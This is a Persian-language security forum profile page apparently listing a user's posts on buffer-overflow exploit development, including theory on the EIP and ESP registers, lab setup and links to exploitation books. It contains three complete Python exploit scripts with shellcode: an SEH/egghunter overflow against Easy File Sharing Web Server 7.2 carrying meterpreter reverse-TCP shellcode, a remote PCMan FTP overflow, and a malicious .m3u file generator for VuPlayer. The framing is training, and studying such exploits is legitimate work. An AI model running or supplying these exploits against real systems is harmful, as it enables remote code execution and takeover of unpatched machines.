با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
-
تعداد ارسال ها
12 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
1
آخرین بار برد XoDiAK در بهمن 26 2021
XoDiAK یکی از رکورد داران بیشترین تعداد پسند مطالب است !
اعتبار در سایت
3 Neutralدرباره XoDiAK
- تاریخ تولد 08/05/1999
Converted
-
Name
آرش
-
Main os
Debian
-
Programming language
خیر
آخرین بازدید کنندگان نمایه
بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.
-
-
XoDiAK شروع به دنبال کردن Offensive Security Cracking The Perimeter Ebook، کتاب Gray Hat Python، Easy File Sharing Server 7.2 Seh Buffer Overflow + Egghunter و و 2 کاربر دیگر کرد
-
Easy File Sharing Server 7.2 Seh Buffer Overflow + Egghunter
یک موضوع پاسخی ارسال کرد برای XoDiAK در آسیب پذیری های کشف و گزارش شده
اسیب پذیری بافر اورفلو در برنامه Easy File Sharing Web Server 7.2 https://packetstormsecurity.com/files/138589/Easy-File-Sharing-Web-Server-7.2-SEH-Buffer-Overflow.html https://cxsecurity.com/issue/WLB-2016090019 #!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter) # Date: 2016/8/31 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.sharing-file.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 [LATEST] # Tested on: Microsoft Windows 7 Professional x86 [should Work On The Other Operating Systems] # CVE : N/A # Usage : python exploit.py [iP or Domain] # Discovered By Arash Khazaei (AKA XoDiAK) # Greetz To Iran Cyber Members & My Friends import sys,socket from struct import pack HOST = sys.argv[1] PORT = 80 # msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte # Replace It With Your Own Shellcode ! shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1" "\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d" "\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61" "\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79" "\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32" "\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9" "\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f" "\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85" "\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7" "\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab" "\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3" "\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31" "\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba" "\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11" "\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90" "\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e" "\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09" "\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a" "\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59" "\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb" "\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b" "\x98\x35\x70\x3b\xe0") # Padding ! junk = "A" * 4061 # Next SEH nseh = "\xeb\x06\x90\x90" # 0x1000108b [imageLoader.dll] POP POP RET seh = pack('<L', 0x10018848) # Egg Hunter 32 Byte Tag = w00tw00t egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000) try: s = socket.socket() s.connect((HOST, PORT)) s.send("GET " + exploit + " HTTP/1.0\r\n\r\n") s.close() except: print "Can't Connect To Web Server ! Is it up ?" print "Evil Buffer Sended Successfully!" EFS Web Server 7.2. SEH Overflow (EggHunter).zip-
- 1
-
-
- buffer overflow
- exploit
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
سلام خدمت شما استاد گرامی . یه سوال از خدمتتون دارم ایا کتاب " اموزش پیشرفته متاسپلویت" سایت نت اموزشکه تو چند فصلش کامل اموزش فازینگ و اکسپلویتینگ میپردازه به نظر شما من که علاقه دارم به این مقوله مفید و واسه شروع خوبه تهیه و کار کنم؟ اگه شما یا کسی هم کتابشو داشته باشه تو انجمن بذاره عالی میشه و ممنون میشیم با تشکر
-
security Buffer Overflow And Exploit Developing Training
XoDiAK پاسخی برای موضوع ارسال کرد برای یک XoDiAK در Vulnerability Laboratory
با سلام خدمت همه ی اعضا در این قسمت از اموزش همونطور که در پست اول گفته شده بود اموزش اکسپلویت و سوءاستفاده از اسیب پذیری بافر اورفلو به صورت ریموت یا از راه دور قرار گرفته شه ! در این اموزش ما یک FTP Server رو انالیز و اکسپلویت میکنم . اموزش در ۲۷ دقیقه به تصویری . حجم: ۳۶.۵ مگابایت امیدوارم از اموزش لذت ببرید انتقادی پیشنهادی درخواستی داشتید در پ.خ درمیون بزارید حتما . لینک دانلود : https://mega.nz/#!cF4yhCCB!0EE8rQR9tnkhqClxy8eaQrErS3f43uMdAz_QsNm0P6o اکسپلویت کامل شده : #!/usr/bin/python #[+] Exploit Title: PCMANFtp Server (PUT) Command Buffer Overflow #[+] Date: 31/8/2016 #[+] Exploit Author: Iran Cyber Security Team #[+] Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z #[+] Version: 2.49 #[+] Tested on: Windows 7 Professional X86 #Reference : https://www.exploit-db.com/exploits/39662 #[+] CVE : N/A # Usage : PcManftp.py [iP Address] import socket,sys HOST = sys.argv[1] PORT = 21 junk = "A"*2007 # Junk A # msvcrt.dll 0x77A2B391 FFE4 JMP ESP eip = "\x91\xB3\xA2\x77" # Calc.exe Universal Shellcode ! evil = ("\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x10\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0") exploit = junk + eip + "\x90"*50 + evil s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create Socket s.connect((HOST,PORT)) # connecting To FTP Server s.recv(1024) # Read Banner FTP s.send('USER anonymous\r\n') # UserName Input s.recv(1024) # Recv Password Input Message s.send('PASS \r\n') # Password Input s.recv(1024) # Recv Welcome Message s.send('PUT '+ exploit + '\r\n') # Sending Buffer ! s.close() # Socket Close print "Evil Buffer Sended Successfully! To " + sys.argv[1]- 8 پاسخ
-
- 1
-
-
- buffer overflow
- remote exploits
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
کتاب Gray Hat Python اموزش دیباگینگ و انالیز برنامه ها و اکسپلویت نویسی در پایتون ! رمز : iran-cyber.net Gray Hat Python.rar
-
security Buffer Overflow And Exploit Developing Training
XoDiAK پاسخی برای موضوع ارسال کرد برای یک XoDiAK در Vulnerability Laboratory
تمامی پارت ها برای دانلود ! هر پارت 10 مگ ویدیو بسیار کامل به مدت 45 دقیقه کامل برای Extract از اخرین نسخه Winrar استفاده کنید ! رمز : iran-cyber.net امیدوارم خسته نشید ! https://mega.nz/#F!gRh0mTLQ!TQ_AtxfUXP3We3aJo9rDMA اکسپلویت کامل شده : #!/usr/bin/python #[+] Exploit Title: VuPlayer ('.m3u') Local Buffer Overflow #[+] Date: 26/8/2016 #[+] Exploit Author: Iran Cyber Security Team #[+] http://vuplayer.com/ #[+] Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe #[+] Version: 2.49 #[+] Tested on: Windows 7 Professional #[+] CVE : N/A #Reference : https://www.exploit-db.com/exploits/13756/ import sys junk = "A"*1012 # JMP ESP BASS.DLL 0x1010539F eip = "\x9F\x53\x10\x10" # NOPS nop = "\x90"*50 # msfvenom -p windows/exec CMD="calc.exe" -b "\x00\x09\x0a\x0d\x1a" -f c buf = ("\xda\xdd\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x31\xba\xb3\x98\xc4" "\xb4\x31\x55\x18\x83\xed\xfc\x03\x55\xa7\x7a\x31\x48\x2f\xf8" "\xba\xb1\xaf\x9d\x33\x54\x9e\x9d\x20\x1c\xb0\x2d\x22\x70\x3c" "\xc5\x66\x61\xb7\xab\xae\x86\x70\x01\x89\xa9\x81\x3a\xe9\xa8" "\x01\x41\x3e\x0b\x38\x8a\x33\x4a\x7d\xf7\xbe\x1e\xd6\x73\x6c" "\x8f\x53\xc9\xad\x24\x2f\xdf\xb5\xd9\xe7\xde\x94\x4f\x7c\xb9" "\x36\x71\x51\xb1\x7e\x69\xb6\xfc\xc9\x02\x0c\x8a\xcb\xc2\x5d" "\x73\x67\x2b\x52\x86\x79\x6b\x54\x79\x0c\x85\xa7\x04\x17\x52" "\xda\xd2\x92\x41\x7c\x90\x05\xae\x7d\x75\xd3\x25\x71\x32\x97" "\x62\x95\xc5\x74\x19\xa1\x4e\x7b\xce\x20\x14\x58\xca\x69\xce" "\xc1\x4b\xd7\xa1\xfe\x8c\xb8\x1e\x5b\xc6\x54\x4a\xd6\x85\x32" "\x8d\x64\xb0\x70\x8d\x76\xbb\x24\xe6\x47\x30\xab\x71\x58\x93" "\x88\x8e\x12\xbe\xb8\x06\xfb\x2a\xf9\x4a\xfc\x80\x3d\x73\x7f" "\x21\xbd\x80\x9f\x40\xb8\xcd\x27\xb8\xb0\x5e\xc2\xbe\x67\x5e" "\xc7\xdc\xe6\xcc\x8b\x0c\x8d\x74\x29\x51") # Putting All Together .. exploit = junk + eip + nop + buf f = open('evil.m3u','w') f.write(exploit) f.close print "File Name : " + sys.argv[0] print "Exploit Successfully Generated !"- 8 پاسخ
-
- 1
-
-
- buffer overflow
- remote exploits
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
security Buffer Overflow And Exploit Developing Training
XoDiAK پاسخی برای موضوع ارسال کرد برای یک XoDiAK در Vulnerability Laboratory
قبل از هر چیز نیازه که ما درک و اشنایی از ثبات ها یا رجیستر های CPU داشته باشیم ما در عمل اکسپلویتینگ باید به چند تا از ثبات ها که توجه زیادی داشته باشیم که 2 تا از مهمترین ها رجیستر های ESP و EIP هستن. خب حالا این 2 ثبات چیکار میکنن ؟ ESP : ثبات ESP به بالای ترین نقطه Stack اشاره میکنه ! EIP : به ادرس بعدی که باید اجرا بشه اشاره میکند. خوب حالا فرض کنید برنامه ورودی داشته باشه مثلا نام که 256 بایت ورودی میگیره و اون رو خروجی میده رو کنسول یا در حالات دیگه ! حالا اگر ما به این برنامه 257 بایت یا بیشتر ورودی بدیم چه اتفاقی میفته ؟ برنامه کرش میکنه و طبق 256 بایت حداکثر تعین شده باشه ما اگر 264 بایت به برنامه بدیم ادرس EIP رو میتونیم تغییر بدیم (توجه داشته باشید که 4 بایت اول رو رجیستر EBP نگه میداره) خوب حالا که ما میتونیم EIP رو تغییر بدیم یعنی میتونی ادرس رو به هر جا از برنامه تغییر بدیم و برنامه رو کنترل کنیم . حال ما که دسترسی کامل به EIP داریم اگر بیایم ادرس رو به یک JMP ESP بفرستیم باعث میشه برنامه به سمت بالاترین نقطه استک فرستاده بشه و ما میایم استک رو با شل کد (کد مخربی که به زبان ماشین نوشته شده و باعث اجرای یک دستور خاص میشود !) خودمون پر میکنیم و خط به خط شل کد ما اجرا میشه و باعث میشه ما دسترسی از شل یا در سطح های بالاتر حتی باعث گرفتن دسترسی روت در سیستم میشه ! پ.نـ : توجه داشته باشید استک طبق استاندارد LIFO یا Last-In-First-Out کار میکند یعنی : LIFO کوتاهشدهٔ عبارت Last In First Out (آخرین ورودی از همه زودتر خارج میشود) است. این سیاست اساس کار پشتهها را تشکیل میدهد و به مفهوم آن است که آخرین دادهٔ ذخیره شده در پشته، نخستین دادهای است که بازیابی میشود. خب واسه این پست کافیه به نظرم پست بعدی انشالله به صورت تصویری همین تئوری رو بهتون نشون میدم!- 8 پاسخ
-
- buffer overflow
- remote exploits
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
security Buffer Overflow And Exploit Developing Training
XoDiAK پاسخی برای موضوع ارسال کرد برای یک XoDiAK در Vulnerability Laboratory
قبل از هر چیز ما باید Lab یا ازمایشگاه خودمون رو برای تست نفوذ و اکسپلویت نویسی اماده کنیم خب یکی از اصلی ترین نیاز های ما یک ماشین مجازی برای استفاده وجلوگیری از اسیب رسیدن به سیستم اصلی میباشد که پیشنهاد میکنم از یک ویندوز به صورت مجازی و از برنامه ی Virtual Box استفاده کنید که البته بر عکس این داستان هم مشکلی نداره فقط باید مراقب باشید! دومین چیز و یکی از مهم ترین ها Immunity Debugger هست که ما با این برنامه خیلی کار داریم و شما میتونید این برنامه رو از سایت زیر دانلود کنید : http://debugger.immunityinc.com/ID_register.py نیازی به وارد کردن اطلاعات واقعی نیست برای دانلود ! بعد از نصب دیباگر , پلاگین Mona.py که ضمیمه شده را دانلود کنید و به محل نصب برید و در پوشه ی PyCommands کپی کنید که در اینده از اون استفاده های زیادی میکنیم ! توجه داشته باشید دیباگر روی ماشین مجازی ویندوز نصب کنید ! خوب ازمایشگاه یا Lab اماده است برای شروع کار . تو ارسال پست بعد با دیباگر کار کنید و باهاش ور برید که باهاش اشنا بشید!- 8 پاسخ
-
- buffer overflow
- remote exploits
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
دانلود کتاب Hacking The Art Of Exploitation 2nd Edition یکی از کتاب های عالی در زمینه اکسپلویت نویسی رمز : iran-cyber.net حجم:3.5 مگابایت Hacking The Art Of Exploitation 2nd Edition[iran-cyber.net].zip
-
security Buffer Overflow And Exploit Developing Training
یک موضوع پاسخی ارسال کرد برای XoDiAK در Vulnerability Laboratory
با سلام و درود فراوان به اعضای انجمن . در این تاپیک به صورت تصویری اموزش اکسپلویت اسیب پذیری های لوکال و ریموت اسیب پذیری های بافر اورفلو قرار میگیرد و سعی میشود به صورت هفتگی یک اموزش قرار میگیرد . سر فصل ها : کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی (لوکال) کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی 2 ( ریموت) کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی و بایپس SEH در برنامه (لوکال) کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی و بایپس DEP و ASLR (لوکال و ریموت) و .... سرفصل به مرور زمان اپدیت میشود ! و اما پیشنیاز های این اموزش ها : درک کامل از CPU و Memory و نحوه کار آن یک ماشین مجازی ویندوز XP یا 7 (میتواند سیستم عامل اصلی باشد و ماشین کالی به صورت مجازی باشد در هر حال توصیه نمیشود) اشنایی با یکی از زبان های Perl , Python , PHP اشنایی با دیباگر ها ( Ollydbg یا Immunity Debugger)- 8 پاسخ
-
- buffer overflow
- remote exploits
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
دانلود کتاب Offensive Security Cracking the Perimeter پسورد : iran-cyber.net Offensive.Security.BackTrack.to.the.Max.Cracking.the.Perimeter.v1.0[iran-cyber.net].rar
-
- exploit
- exploit development
-
(و 2 مورد دیگر)
برچسب زده شده با :
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.